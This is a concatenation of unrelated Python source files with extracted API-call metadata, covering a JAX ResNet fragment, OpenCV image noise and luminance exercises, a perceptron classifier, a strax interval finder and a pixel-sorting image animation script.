(['grads'], {}), '(grads)\n', (6019, 6026), False, 'from jax.tree_util import tree_map, tree_flatten, tree_unflatten\n'), ((6246, 6282), 'jax.tree_util.tree_unflatten', 'tree_unflatten', (['local_treedef', 'grads'], {}), '(local_treedef, grads)\n', (6260, 6282), False, 'from jax.tree_util import tree_map, tree_flatten, tree_unflatten\n'), ((6616, 6649), 'jax.tree_util.tree_map', 'tree_map', (['replicate_array', 'params'], {}), '(replicate_array, params)\n', (6624, 6649), False, 'from jax.tree_util import tree_map, tree_flatten, tree_unflatten\n'), ((7396, 7441), 'jax.numpy.broadcast_to', 'jnp.broadcast_to', (['x', '((num_devices,) + x.shape)'], {}), '(x, (num_devices,) + x.shape)\n', (7412, 7441), True, 'import jax.numpy as jnp\n'), ((7541, 
7576), 'jax.tree_util.tree_map', 'tree_map', (['replicate_array', 'op_state'], {}), '(replicate_array, op_state)\n', (7549, 7576), False, 'from jax.tree_util import tree_map, tree_flatten, tree_unflatten\n'), ((2595, 2617), 'jax.experimental.stax.Conv', 'Conv', (['filters1', '(1, 1)'], {}), '(filters1, (1, 1))\n', (2599, 2617), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2619, 2630), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2628, 2630), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2646, 2686), 'jax.experimental.stax.Conv', 'Conv', (['filters2', '(ks, ks)'], {'padding': '"""SAME"""'}), "(filters2, (ks, ks), padding='SAME')\n", (2650, 2686), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2688, 2699), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2697, 2699), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2715, 2743), 'jax.experimental.stax.Conv', 'Conv', (['input_shape[3]', '(1, 1)'], {}), '(input_shape[3], (1, 1))\n', (2719, 2743), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2745, 2756), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2754, 2756), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((4200, 4225), 'jax.numpy.sum', 'jnp.sum', (['(logits * targets)'], {}), '(logits * targets)\n', (4207, 4225), True, 'import jax.numpy as jnp\n'), ((5953, 5963), 'jax.grad', 'grad', (['loss'], {}), '(loss)\n', (5957, 5963), False, 'from jax import jit, grad, random\n'), ((6194, 6215), 'jax.lax.psum', 'lax.psum', (['dw', '"""batch"""'], {}), "(dw, 'batch')\n", (6202, 6215), False, 'from jax import lax\n'), ((6437, 6447), 'jax.grad', 'grad', (['loss'], {}), '(loss)\n', (6441, 6447), False, 'from jax import jit, grad, random\n'), ((7744, 7755), 'time.time', 'time.time', ([], {}), '()\n', (7753, 7755), False, 'import time\n'), ((8634, 8645), 'time.time', 'time.time', ([], {}), '()\n', (8643, 8645), False, 'import time\n'), ((4677, 4700), 'jax.numpy.arange', 'jnp.arange', (['num_classes'], {}), '(num_classes)\n', (4687, 4700), True, 'import jax.numpy as jnp\n'), ((5434, 5457), 'jax.numpy.arange', 'jnp.arange', (['num_classes'], {}), '(num_classes)\n', (5444, 5457), True, 'import jax.numpy as jnp\n'), ((5736, 5746), 'jax.grad', 'grad', (['loss'], {}), '(loss)\n', (5740, 5746), False, 'from jax import jit, grad, random\n'), ((6505, 6518), 'jax.devices', 'jax.devices', ([], {}), '()\n', (6516, 6518), False, 'import jax\n'), ((6796, 6814), 'jax.numpy.sum', 'jnp.sum', (['x'], {'axis': '(0)'}), '(x, axis=0)\n', (6803, 6814), True, 'import jax.numpy as jnp\n'), ((6706, 6719), 'jax.devices', 'jax.devices', ([], {}), '()\n', (6717, 6719), False, 'import jax\n'), ((6997, 7010), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7008, 7010), False, 'import jax\n'), ((7234, 7247), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7245, 7247), False, 'import jax\n'), ((7278, 7291), 'jax.devices', 
'jax.devices', ([], {}), '()\n', (7289, 7291), False, 'import jax\n'), ((7807, 7835), 'jax.numpy.array', 'jnp.array', (['([i] * num_devices)'], {}), '([i] * num_devices)\n', (7816, 7835), True, 'import jax.numpy as jnp\n'), ((7923, 7934), 'time.time', 'time.time', ([], {}), '()\n', (7932, 7934), False, 'import time\n'), ((8039, 8052), 'jax.devices', 'jax.devices', ([], {}), '()\n', (8050, 8052), False, 'import jax\n'), ((8721, 8732), 'time.time', 'time.time', ([], {}), '()\n', (8730, 8732), False, 'import time\n'), ((7100, 7113), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7111, 7113), False, 'import jax\n'), ((7147, 7157), 'jax.grad', 'grad', (['loss'], {}), '(loss)\n', (7151, 7157), False, 'from jax import jit, grad, random\n'), ((7182, 7195), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7193, 7195), False, 'import jax\n'), ((8596, 8609), 'jax.devices', 'jax.devices', ([], {}), '()\n', (8607, 8609), False, 'import jax\n')]
|
import os
from math import *
import numpy as np
from scipy import misc
from scipy.ndimage import gaussian_filter
import cv2
def reviseImage():
img_names = [
"1.jpeg", "2.jpeg", "3.jpeg", "dark.jpeg", "overexposure.jpeg"
]
for filename in img_names:
fn = "./img_data/cutted/" + filename
img = cv2.imread(fn, cv2.IMREAD_GRAYSCALE)
newimg = cv2.resize(img, (640, 480))
cv2.imwrite("./part1/revised_" + filename, newimg)
def geoTransform():
"""
(2) geometric transformations
"""
for fn in os.listdir("./part1"):
path = "./part1/%s" % fn
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
# [1] https://docs.opencv.org/3.4.2/da/d6e/tutorial_py_geometric_transformations.html
double = cv2.resize(img, (1280, 960), interpolation=cv2.INTER_LINEAR)
shrink = cv2.resize(img, (320, 240), interpolation=cv2.INTER_CUBIC)
stretch = cv2.resize(img, (1280, 720), interpolation=cv2.INTER_CUBIC)
cv2.imwrite("./part2/double_" + fn, double)
cv2.imwrite("./part2/shrink_" + fn, shrink)
cv2.imwrite("./part2/stretch_" + fn, stretch)
def addGaussianNoises():
"""
(3) add 3 different noises
"""
img_names = [
"1.jpeg", "2.jpeg", "3.jpeg", "dark.jpeg", "overexposure.jpeg"
]
for (m, v) in [(10, 100), (50, 30), (200, 200)]:
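        # each (m, v) pair is the mean and variance of the additive Gaussian noise; s = sqrt(v) below is its standard deviation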
for filename in img_names:
s = sqrt(v)
fn = "./part1/revised_" + filename
img = cv2.imread(fn, cv2.IMREAD_UNCHANGED)
gaussian = np.random.normal(m, s, (480, 640))
noisy_image = np.zeros(img.shape, np.float32)
noisy_image = img + gaussian
cv2.normalize(
noisy_image, noisy_image, 0, 255, cv2.NORM_MINMAX, dtype=-1)
noisy_image = noisy_image.astype(np.uint8)
cv2.imwrite("./part3/%d_%d_" % (m, v) + filename, noisy_image)
def removeGaussianNoises():
"""
(4) remove noises from part 3
"""
for fn in os.listdir("./part3"):
path = "./part3/%s" % fn
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
newimg = cv2.fastNlMeansDenoising(img, None, 10, 7, 21)
cv2.imwrite("./part4/denoise_" + fn, newimg)
def luminanceAdjust():
"""
    (5) luminance adjustment of the overexposed and dark images from (1)
"""
filename = ["dark.jpeg", "overexposure.jpeg"]
for fn in filename:
path = "./part1/revised_" + fn
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
# 1. histogram equalize
newimg = cv2.equalizeHist(img)
cv2.imwrite("./part5/equHist_" + fn, newimg)
# 2. Gamma correction
gamma = 0.4
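        # build a lookup table implementing out = 255 * (in/255)**gamma; gamma < 1 brightens dark regions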
LUT = np.empty((1, 256), np.uint8)
for i in range(256):
LUT[0, i] = np.clip((i / 255.0)**gamma * 255.0, 0, 255)
newimg2 = cv2.LUT(img, LUT)
cv2.imwrite("./part5/gamma_" + fn, newimg2)
def main():
# part 1
#reviseImage()
# part 2
#geoTransform()
# part 3
#addGaussianNoises()
# part 4
#removeGaussianNoises()
# part 5
luminanceAdjust()
if __name__ == "__main__":
main()
|
[
"cv2.equalizeHist",
"cv2.imwrite",
"numpy.empty",
"numpy.zeros",
"numpy.clip",
"cv2.fastNlMeansDenoising",
"cv2.imread",
"cv2.LUT",
"numpy.random.normal",
"cv2.normalize",
"os.listdir",
"cv2.resize"
] |
[((559, 580), 'os.listdir', 'os.listdir', (['"""./part1"""'], {}), "('./part1')\n", (569, 580), False, 'import os\n'), ((2020, 2041), 'os.listdir', 'os.listdir', (['"""./part3"""'], {}), "('./part3')\n", (2030, 2041), False, 'import os\n'), ((332, 368), 'cv2.imread', 'cv2.imread', (['fn', 'cv2.IMREAD_GRAYSCALE'], {}), '(fn, cv2.IMREAD_GRAYSCALE)\n', (342, 368), False, 'import cv2\n'), ((386, 413), 'cv2.resize', 'cv2.resize', (['img', '(640, 480)'], {}), '(img, (640, 480))\n', (396, 413), False, 'import cv2\n'), ((422, 472), 'cv2.imwrite', 'cv2.imwrite', (["('./part1/revised_' + filename)", 'newimg'], {}), "('./part1/revised_' + filename, newimg)\n", (433, 472), False, 'import cv2\n'), ((629, 667), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_UNCHANGED'], {}), '(path, cv2.IMREAD_UNCHANGED)\n', (639, 667), False, 'import cv2\n'), ((779, 839), 'cv2.resize', 'cv2.resize', (['img', '(1280, 960)'], {'interpolation': 'cv2.INTER_LINEAR'}), '(img, (1280, 960), interpolation=cv2.INTER_LINEAR)\n', (789, 839), False, 'import cv2\n'), ((857, 915), 'cv2.resize', 'cv2.resize', (['img', '(320, 240)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(img, (320, 240), interpolation=cv2.INTER_CUBIC)\n', (867, 915), False, 'import cv2\n'), ((934, 993), 'cv2.resize', 'cv2.resize', (['img', '(1280, 720)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(img, (1280, 720), interpolation=cv2.INTER_CUBIC)\n', (944, 993), False, 'import cv2\n'), ((1002, 1045), 'cv2.imwrite', 'cv2.imwrite', (["('./part2/double_' + fn)", 'double'], {}), "('./part2/double_' + fn, double)\n", (1013, 1045), False, 'import cv2\n'), ((1054, 1097), 'cv2.imwrite', 'cv2.imwrite', (["('./part2/shrink_' + fn)", 'shrink'], {}), "('./part2/shrink_' + fn, shrink)\n", (1065, 1097), False, 'import cv2\n'), ((1106, 1151), 'cv2.imwrite', 'cv2.imwrite', (["('./part2/stretch_' + fn)", 'stretch'], {}), "('./part2/stretch_' + fn, stretch)\n", (1117, 1151), False, 'import cv2\n'), ((2090, 2128), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_UNCHANGED'], {}), '(path, cv2.IMREAD_UNCHANGED)\n', (2100, 2128), False, 'import cv2\n'), ((2146, 2192), 'cv2.fastNlMeansDenoising', 'cv2.fastNlMeansDenoising', (['img', 'None', '(10)', '(7)', '(21)'], {}), '(img, None, 10, 7, 21)\n', (2170, 2192), False, 'import cv2\n'), ((2201, 2245), 'cv2.imwrite', 'cv2.imwrite', (["('./part4/denoise_' + fn)", 'newimg'], {}), "('./part4/denoise_' + fn, newimg)\n", (2212, 2245), False, 'import cv2\n'), ((2482, 2520), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_UNCHANGED'], {}), '(path, cv2.IMREAD_UNCHANGED)\n', (2492, 2520), False, 'import cv2\n'), ((2570, 2591), 'cv2.equalizeHist', 'cv2.equalizeHist', (['img'], {}), '(img)\n', (2586, 2591), False, 'import cv2\n'), ((2600, 2644), 'cv2.imwrite', 'cv2.imwrite', (["('./part5/equHist_' + fn)", 'newimg'], {}), "('./part5/equHist_' + fn, newimg)\n", (2611, 2644), False, 'import cv2\n'), ((2709, 2737), 'numpy.empty', 'np.empty', (['(1, 256)', 'np.uint8'], {}), '((1, 256), np.uint8)\n', (2717, 2737), True, 'import numpy as np\n'), ((2853, 2870), 'cv2.LUT', 'cv2.LUT', (['img', 'LUT'], {}), '(img, LUT)\n', (2860, 2870), False, 'import cv2\n'), ((2879, 2922), 'cv2.imwrite', 'cv2.imwrite', (["('./part5/gamma_' + fn)", 'newimg2'], {}), "('./part5/gamma_' + fn, newimg2)\n", (2890, 2922), False, 'import cv2\n'), ((1498, 1534), 'cv2.imread', 'cv2.imread', (['fn', 'cv2.IMREAD_UNCHANGED'], {}), '(fn, cv2.IMREAD_UNCHANGED)\n', (1508, 1534), False, 'import cv2\n'), ((1558, 1592), 'numpy.random.normal', 'np.random.normal', (['m', 's', '(480, 640)'], {}), 
'(m, s, (480, 640))\n', (1574, 1592), True, 'import numpy as np\n'), ((1619, 1650), 'numpy.zeros', 'np.zeros', (['img.shape', 'np.float32'], {}), '(img.shape, np.float32)\n', (1627, 1650), True, 'import numpy as np\n'), ((1704, 1778), 'cv2.normalize', 'cv2.normalize', (['noisy_image', 'noisy_image', '(0)', '(255)', 'cv2.NORM_MINMAX'], {'dtype': '(-1)'}), '(noisy_image, noisy_image, 0, 255, cv2.NORM_MINMAX, dtype=-1)\n', (1717, 1778), False, 'import cv2\n'), ((1863, 1925), 'cv2.imwrite', 'cv2.imwrite', (["('./part3/%d_%d_' % (m, v) + filename)", 'noisy_image'], {}), "('./part3/%d_%d_' % (m, v) + filename, noisy_image)\n", (1874, 1925), False, 'import cv2\n'), ((2791, 2836), 'numpy.clip', 'np.clip', (['((i / 255.0) ** gamma * 255.0)', '(0)', '(255)'], {}), '((i / 255.0) ** gamma * 255.0, 0, 255)\n', (2798, 2836), True, 'import numpy as np\n')]
|
'''
Author:
<NAME> <<EMAIL>>
<NAME> <<EMAIL>>
'''
import numpy as np
class Perceptron:
def __init__(self, datapoints, no_of_inputs, threshold=1000, learning_rate=0.0001, isPocket = False):
self.threshold = threshold
self.learning_rate = learning_rate
self.weights = np.random.normal(0, 0.1, no_of_inputs + 1)
self.datapoints = datapoints
self.isPocket = isPocket
def predict(self, inputs):
summation = np.dot(inputs, self.weights[1:]) + self.weights[0]
if summation > 0:
activation = 1
else:
activation = 0
return activation
def train(self):
training_inputs, labels = self.datapoints[:,:-2], self.datapoints[:,-2:-1]
misclassified = 1
iteration = 0
while misclassified != 0:
misclassified = 0
iteration += 1
for inputs, label in zip(training_inputs, labels):
prediction = self.predict(inputs)
error_rate = 1 if label == 1 else -1
if (label == 1 and prediction == 0) or (label == -1 and prediction == 1):
misclassified += 1
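                    # perceptron update rule: w <- w + learning_rate * t * x, where t (= error_rate) is the +/-1 target sign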
self.weights[1:] += self.learning_rate * error_rate * inputs
self.weights[0] += self.learning_rate * error_rate
if iteration % 50 == 0:
print("Iteration {}, misclassified points {}, Evaluation {}%".format(iteration, misclassified, self.evaluate()))
print("")
print("======== Result ========= ")
print("Iteration {}, misclassified points {}".format(iteration, misclassified))
print("Evaluation {}%".format(self.evaluate()))
def evaluate(self):
correct = 0
training_inputs, labels = self.datapoints[:,:-2], self.datapoints[:,-2:-1]
for inputs, label in zip(training_inputs, labels):
prediction = self.predict(inputs)
if (label == 1 and prediction == 1) or (label == -1 and prediction == 0):
correct += 1
_acc = correct / float(len(training_inputs)) * 100.0
return _acc
def printResult(self):
print("Weights After Final Iteration: ", np.round(self.weights.transpose(),3))
#print("Accuracy of Pocket: {}%", self.evaluate())
def getInputData(filename):
data = np.genfromtxt(filename, delimiter=',')
return data
if __name__ == '__main__':
data_points = np.array(getInputData('classification.txt'))
no_of_inputs = 3
pct = Perceptron(data_points, no_of_inputs)
pct.train()
pct.evaluate()
pct.printResult()
|
[
"numpy.dot",
"numpy.genfromtxt",
"numpy.random.normal"
] |
[((2356, 2394), 'numpy.genfromtxt', 'np.genfromtxt', (['filename'], {'delimiter': '""","""'}), "(filename, delimiter=',')\n", (2369, 2394), True, 'import numpy as np\n'), ((310, 352), 'numpy.random.normal', 'np.random.normal', (['(0)', '(0.1)', '(no_of_inputs + 1)'], {}), '(0, 0.1, no_of_inputs + 1)\n', (326, 352), True, 'import numpy as np\n'), ((475, 507), 'numpy.dot', 'np.dot', (['inputs', 'self.weights[1:]'], {}), '(inputs, self.weights[1:])\n', (481, 507), True, 'import numpy as np\n')]
|
import numba
import numpy as np
import pandas as pd
from scipy.interpolate import interp1d
import strax
export, __all__ = strax.exporter(export_self=True)
def init_spe_scaling_factor_distributions(file):
# Extract the spe pdf from a csv file into a pandas dataframe
spe_shapes = pd.read_csv(file)
# Create a converter array from uniform random numbers to SPE gains (one interpolator per channel)
# Scale the distributions so that they have an SPE mean of 1 and then calculate the cdf
uniform_to_pe_arr = []
for ch in spe_shapes.columns[1:]: # skip the first element which is the 'charge' header
if spe_shapes[ch].sum() > 0:
mean_spe = (spe_shapes['charge'] * spe_shapes[ch]).sum() / spe_shapes[ch].sum()
scaled_bins = spe_shapes['charge'] / mean_spe
cdf = np.cumsum(spe_shapes[ch]) / np.sum(spe_shapes[ch])
else:
# if sum is 0, just make some dummy axes to pass to interpolator
cdf = np.linspace(0, 1, 10)
scaled_bins = np.zeros_like(cdf)
uniform_to_pe_arr.append(interp1d(cdf, scaled_bins))
if uniform_to_pe_arr != []:
return uniform_to_pe_arr
@export
@numba.jit(numba.int32(numba.int64[:], numba.int64, numba.int64, numba.int64[:, :]),
nopython=True)
def find_intervals_below_threshold(w, threshold, holdoff, result_buffer):
"""Fills result_buffer with l, r bounds of intervals in w < threshold.
:param w: Waveform to do hitfinding in
:param threshold: Threshold for including an interval
:param result_buffer: numpy N*2 array of ints, will be filled by function.
if more than N intervals are found, none past the first N will be processed.
:returns : number of intervals processed
Boundary indices are inclusive, i.e. the right boundary is the last index which was < threshold
"""
result_buffer_size = len(result_buffer)
last_index_in_w = len(w) - 1
in_interval = False
current_interval = 0
current_interval_start = -1
current_interval_end = -1
for i, x in enumerate(w):
if x < threshold:
if not in_interval:
# Start of an interval
in_interval = True
current_interval_start = i
current_interval_end = i
if ((i == last_index_in_w and in_interval) or
(x >= threshold and i >= current_interval_end + holdoff and in_interval)):
# End of the current interval
in_interval = False
# Add bounds to result buffer
result_buffer[current_interval, 0] = current_interval_start
result_buffer[current_interval, 1] = current_interval_end
current_interval += 1
            if current_interval == result_buffer_size:
                # result_buffer is full: stop searching so we do not write past its end
                break
n_intervals = current_interval # No +1, as current_interval was incremented also when the last interval closed
return n_intervals
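# Hedged usage sketch (illustrative, not part of the original module):
def _find_intervals_example():
    # toy waveform: look for stretches strictly below a threshold of 5, with no holdoff
    w = np.array([9, 9, 1, 2, 9, 9, 0, 9], dtype=np.int64)
    result_buffer = np.zeros((10, 2), dtype=np.int64)
    n = find_intervals_below_threshold(w, 5, 0, result_buffer)
    return n, result_buffer[:n]  # expected: 2 intervals, [2, 3] and [6, 6]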
|
[
"numpy.zeros_like",
"numpy.sum",
"pandas.read_csv",
"numba.int32",
"numpy.cumsum",
"scipy.interpolate.interp1d",
"numpy.linspace",
"strax.exporter"
] |
[((123, 155), 'strax.exporter', 'strax.exporter', ([], {'export_self': '(True)'}), '(export_self=True)\n', (137, 155), False, 'import strax\n'), ((290, 307), 'pandas.read_csv', 'pd.read_csv', (['file'], {}), '(file)\n', (301, 307), True, 'import pandas as pd\n'), ((1205, 1277), 'numba.int32', 'numba.int32', (['numba.int64[:]', 'numba.int64', 'numba.int64', 'numba.int64[:, :]'], {}), '(numba.int64[:], numba.int64, numba.int64, numba.int64[:, :])\n', (1216, 1277), False, 'import numba\n'), ((989, 1010), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(10)'], {}), '(0, 1, 10)\n', (1000, 1010), True, 'import numpy as np\n'), ((1037, 1055), 'numpy.zeros_like', 'np.zeros_like', (['cdf'], {}), '(cdf)\n', (1050, 1055), True, 'import numpy as np\n'), ((1090, 1116), 'scipy.interpolate.interp1d', 'interp1d', (['cdf', 'scaled_bins'], {}), '(cdf, scaled_bins)\n', (1098, 1116), False, 'from scipy.interpolate import interp1d\n'), ((829, 854), 'numpy.cumsum', 'np.cumsum', (['spe_shapes[ch]'], {}), '(spe_shapes[ch])\n', (838, 854), True, 'import numpy as np\n'), ((857, 879), 'numpy.sum', 'np.sum', (['spe_shapes[ch]'], {}), '(spe_shapes[ch])\n', (863, 879), True, 'import numpy as np\n')]
|
import numpy as np
import scipy.linalg as la
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib.colors import rgb_to_hsv
from imageio import imread
from progress.bar import IncrementalBar
def grayscale_to_coords(image):
"""Sorts a grayscale image's pixels by saturation, and returns arrays
containing the row and column positions corresponding to sorted order,
as well as the sorted intensities as a flattened array."""
rot_image = np.rot90(image,k=-1)
rows,cols = np.unravel_index(np.argsort(rot_image,axis=None),shape=rot_image.shape)
colors = np.sort(rot_image.flatten())
return rows,cols,colors
def color_to_coords(image):
"""Sorts a color image's pixels by hue, and returns arrays containing the
row and column positions corresponding to sorted order, as well as the
sorted rgb values as a Nx3 array."""
rot_image = np.rot90(image,k=-1)
hue = rgb_to_hsv(rot_image)[:,:,0]
mask = np.argsort(hue,axis=None)
rows,cols = np.unravel_index(mask,shape=rot_image.shape[:2])
colors = rot_image.reshape((rot_image.shape[0]*rot_image.shape[1],3))[mask]
return rows,cols,colors
def animate_pixels(imfile1,imfile2,outfile,color=False,verbose=False):
"""Animates a pixel-motion transition between two images. Images must have
the exact same number of pixels. Animation is saved as "outfile".
Parameters
----------
imfile1 : str or file object
The file name or file object for the first image
imfile2 : str or file object
The file name or file object for the second image
outfile : str
The output file name
color : bool, optional
If True, runs in color mode
verbose : bool, optional
If True, displays a progress bar in the console
"""
# Read in images
if color:
img1 = np.array(imread(imfile1))/255
img2 = np.array(imread(imfile2))/255
else:
img1 = np.array(imread(imfile1,as_gray=True))/255
img2 = np.array(imread(imfile2,as_gray=True))/255
# Check number of pixels
if img1.shape[0]*img1.shape[1] != img2.shape[0]*img2.shape[1]:
raise ValueError("Images must have the name number of pixels")
    # Sort pixels by intensity (if grayscale) or hue (if color)
if verbose: bar1 = IncrementalBar("Sorting\t\t", max=2,suffix='%(percent)d%%')
if color: rows1,cols1,colors1 = color_to_coords(img1)
else: rows1,cols1,colors1 = grayscale_to_coords(img1)
if verbose: bar1.next()
if color: rows2,cols2,colors2 = color_to_coords(img2)
else: rows2,cols2,colors2 = grayscale_to_coords(img2)
if verbose: bar1.next(); bar1.finish()
# n is number of frames of one-directional transition
# buffer is number of stationary frames before and after the transitions
# total is number of frames for two transitions with 2 buffer periods each
n=100
buffer = 10
total = 2*n+4*buffer
# np.linspace creates evenly spaced position and color arrays for transition
if verbose: bar2 = IncrementalBar("Interpolating\t",max=4,suffix='%(percent)d%%')
colors = np.linspace(colors1,colors2,n)
if verbose: bar2.next()
rows = np.linspace(rows1+.5,rows2+.5,n)
if verbose: bar2.next()
cols = np.linspace(cols1+.5,cols2+.5,n)
if verbose: bar2.next()
pos = np.dstack((rows,cols))
if verbose: bar2.next(); bar2.finish()
# Calculate the aspect ratio of the two images
aspect_ratio1 = img1.shape[0]/img1.shape[1]
aspect_ratio2 = img2.shape[0]/img2.shape[1]
plt.ioff()
# Figure will always have default matplotlib 6.4 inch width
fig = plt.figure(figsize=(6.4,max(aspect_ratio1,aspect_ratio2)*6.4))
ax = fig.add_subplot(111)
ax.set_aspect("equal")
plt.axis("off")
plt.xlim((0,max(img1.shape[1],img2.shape[1])))
plt.ylim((0,max(img1.shape[0],img2.shape[0])))
# Markers are measured in points, which are 1/72nd of an inch. Calculates
# pixel size in points
pixels = max(img1.shape[1],img2.shape[1])
pixels_per_inch = pixels/6.4
size = 72/pixels_per_inch
# core object is a scatter plot with square markers set to pixel size
if color:
points = ax.scatter(rows[0],cols[0],c=colors1,marker='s',s=size**2)
else:
points = ax.scatter(rows[0],cols[0],c=colors1,cmap="gray",marker='s',s=size**2,vmin=0,vmax=1)
# update function changes the scatter plot at each frame
# set_color works for rgb, set_array works for grayscale
def update(j):
if j >= buffer and j < buffer+n:
i = j-buffer
points.set_offsets(pos[i])
if color: points.set_color(colors[i])
else: points.set_array(colors[i])
elif j >= 3*buffer+n and j < 3*buffer+2*n:
i = n-(j-(3*buffer+n))-1
points.set_offsets(pos[i])
if color: points.set_color(colors[i])
else: points.set_array(colors[i])
if verbose: bar3.next()
if verbose: bar3 = IncrementalBar("Rendering\t",max=total,suffix='%(percent)d%%')
# Create FuncAnimation with 60-millisecond inteval between frames
ani = animation.FuncAnimation(fig,update,frames=total,interval=60)
# Save animation and close the figure
ani.save(outfile)
if verbose: bar3.next(); bar3.finish()
plt.close(fig)
plt.ion()
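# Hedged usage sketch (illustrative; the file names below are placeholders, not from the original):
if __name__ == "__main__":
    animate_pixels("image_a.jpeg", "image_b.jpeg", "transition.gif", color=True, verbose=True)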
|
[
"numpy.dstack",
"matplotlib.pyplot.ioff",
"matplotlib.pyplot.close",
"progress.bar.IncrementalBar",
"imageio.imread",
"numpy.unravel_index",
"matplotlib.pyplot.axis",
"matplotlib.animation.FuncAnimation",
"numpy.argsort",
"matplotlib.pyplot.ion",
"numpy.rot90",
"numpy.linspace",
"matplotlib.colors.rgb_to_hsv"
] |
[((488, 509), 'numpy.rot90', 'np.rot90', (['image'], {'k': '(-1)'}), '(image, k=-1)\n', (496, 509), True, 'import numpy as np\n'), ((907, 928), 'numpy.rot90', 'np.rot90', (['image'], {'k': '(-1)'}), '(image, k=-1)\n', (915, 928), True, 'import numpy as np\n'), ((978, 1004), 'numpy.argsort', 'np.argsort', (['hue'], {'axis': 'None'}), '(hue, axis=None)\n', (988, 1004), True, 'import numpy as np\n'), ((1020, 1069), 'numpy.unravel_index', 'np.unravel_index', (['mask'], {'shape': 'rot_image.shape[:2]'}), '(mask, shape=rot_image.shape[:2])\n', (1036, 1069), True, 'import numpy as np\n'), ((3132, 3164), 'numpy.linspace', 'np.linspace', (['colors1', 'colors2', 'n'], {}), '(colors1, colors2, n)\n', (3143, 3164), True, 'import numpy as np\n'), ((3202, 3242), 'numpy.linspace', 'np.linspace', (['(rows1 + 0.5)', '(rows2 + 0.5)', 'n'], {}), '(rows1 + 0.5, rows2 + 0.5, n)\n', (3213, 3242), True, 'import numpy as np\n'), ((3274, 3314), 'numpy.linspace', 'np.linspace', (['(cols1 + 0.5)', '(cols2 + 0.5)', 'n'], {}), '(cols1 + 0.5, cols2 + 0.5, n)\n', (3285, 3314), True, 'import numpy as np\n'), ((3345, 3368), 'numpy.dstack', 'np.dstack', (['(rows, cols)'], {}), '((rows, cols))\n', (3354, 3368), True, 'import numpy as np\n'), ((3564, 3574), 'matplotlib.pyplot.ioff', 'plt.ioff', ([], {}), '()\n', (3572, 3574), True, 'import matplotlib.pyplot as plt\n'), ((3773, 3788), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (3781, 3788), True, 'import matplotlib.pyplot as plt\n'), ((5149, 5212), 'matplotlib.animation.FuncAnimation', 'animation.FuncAnimation', (['fig', 'update'], {'frames': 'total', 'interval': '(60)'}), '(fig, update, frames=total, interval=60)\n', (5172, 5212), True, 'import matplotlib.animation as animation\n'), ((5322, 5336), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (5331, 5336), True, 'import matplotlib.pyplot as plt\n'), ((5341, 5350), 'matplotlib.pyplot.ion', 'plt.ion', ([], {}), '()\n', (5348, 5350), True, 'import matplotlib.pyplot as plt\n'), ((542, 574), 'numpy.argsort', 'np.argsort', (['rot_image'], {'axis': 'None'}), '(rot_image, axis=None)\n', (552, 574), True, 'import numpy as np\n'), ((938, 959), 'matplotlib.colors.rgb_to_hsv', 'rgb_to_hsv', (['rot_image'], {}), '(rot_image)\n', (948, 959), False, 'from matplotlib.colors import rgb_to_hsv\n'), ((2322, 2382), 'progress.bar.IncrementalBar', 'IncrementalBar', (['"""Sorting\t\t"""'], {'max': '(2)', 'suffix': '"""%(percent)d%%"""'}), "('Sorting\\t\\t', max=2, suffix='%(percent)d%%')\n", (2336, 2382), False, 'from progress.bar import IncrementalBar\n'), ((3056, 3120), 'progress.bar.IncrementalBar', 'IncrementalBar', (['"""Interpolating\t"""'], {'max': '(4)', 'suffix': '"""%(percent)d%%"""'}), "('Interpolating\\t', max=4, suffix='%(percent)d%%')\n", (3070, 3120), False, 'from progress.bar import IncrementalBar\n'), ((5005, 5069), 'progress.bar.IncrementalBar', 'IncrementalBar', (['"""Rendering\t"""'], {'max': 'total', 'suffix': '"""%(percent)d%%"""'}), "('Rendering\\t', max=total, suffix='%(percent)d%%')\n", (5019, 5069), False, 'from progress.bar import IncrementalBar\n'), ((1873, 1888), 'imageio.imread', 'imread', (['imfile1'], {}), '(imfile1)\n', (1879, 1888), False, 'from imageio import imread\n'), ((1918, 1933), 'imageio.imread', 'imread', (['imfile2'], {}), '(imfile2)\n', (1924, 1933), False, 'from imageio import imread\n'), ((1973, 2002), 'imageio.imread', 'imread', (['imfile1'], {'as_gray': '(True)'}), '(imfile1, as_gray=True)\n', (1979, 2002), False, 'from imageio import imread\n'), 
((2031, 2060), 'imageio.imread', 'imread', (['imfile2'], {'as_gray': '(True)'}), '(imfile2, as_gray=True)\n', (2037, 2060), False, 'from imageio import imread\n')]
|
import numpy as np
from joblib import Parallel, delayed
from .affine import *
